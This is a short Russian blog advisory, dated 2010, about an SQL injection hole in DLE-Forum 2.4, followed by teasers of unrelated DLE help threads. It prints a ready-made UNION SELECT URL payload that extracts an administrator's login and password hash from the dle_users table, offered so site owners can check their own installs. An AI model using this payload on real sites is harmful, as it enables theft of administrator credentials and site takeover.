SQL – инъекция в DLE-Forum 2.4

Все блоги / DLE движок для сайтов 12 июня 2010 0

SQL – инъекция в DLE-Forum 2.4
В DLE Forum 2.4 есть уязвимость, которая позволяет выполнять запросы в бд, и узнавать любую инфу, например о логинах и о паролях.
У кого стоит данная версия форума, рекомендуется проверить на уязвимость:

ваш_сайт.ру/?do=forum&showtopic=-1+union+select+1,2,CONCAT_WS(0x3a,name,password),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23+from+dle_users+where+user_group=1+limit+1-- ,

Источник:Украинский сайт о DLE

предыдущая статья

следующая статья

Похожие публикации

Подскажите пожалуйста в чем проблема?

Появилась вот такая ошибка : Fatal error: Call to undefined function userrating() in /engine/modules/profile.php on line 463 Код ниже что нужно править: Показать / Скрыть текст [code]<?php /* ===================================================== DataLife Engine - by SoftNews Media Group

подробнее »

21 августа 2013

Биография актеров 1.6 mod

подскажите кто нибудь как поставить на addnews.tpl этот вещь, никак не получается? Биография актеров 1.6 mod Бография Актеров v 1.6 dle 10.1 Автор: rashpil Модернизировал zorg346 Выполнить следующие SQL запросы: CREATE TABLE IF NOT EXISTS `dle_actors` ( `id`

подробнее »

13 февраля 2014

Большая нагрузка на сервер MySQL

Добрый день, сегодня хостер отключил мне сайт - за то что целую неделю была нагрузка. Изменения на сайте не проводил. Раз и началось. При допустимых нагрузках до 500 к БД стало значение 1200. Выслали мне копи пастом такой лог. Здравствуйте. Ниже предоставлен анализ медленных запросов Показать /

подробнее »

16 сентября 2014

BB code не работают в Google

В спойлере код от модуля Profile Reviews v 1.33 (Стена). Почему то в браузере от google не работают кнопки bbcode, не происходит ни каких действий... Не появляются всплывающие окна, не вставляются смайлы. В Opera и Мазиле все работает. Показать / Скрыть текст <?php

подробнее »

18 сентября 2013

Повтор фото в загрузке

Пользуюсь модулем; тык Решил сделать красивое название фото: место 1406986118_676266.jpg сделал 1406986118.jpg в файле нашел engine/ajax/xfields.upload.php (с:256) $dd['name_real'] = $dd['name']; $dd['name'] = $file_prefix .'_'.$dd['name'];

подробнее »

10 октября 2014

Альтернатива PHP кода

Добрый день ! Какие есть альтернативы, как можно заменить ? $member_id['user_group'] == 1 or $member_id['user_group'] == 2 or $member_id['user_group'] == 3 or $member_id['user_group'] == 6 Мне нужно задать группы

подробнее »

28 июля 2013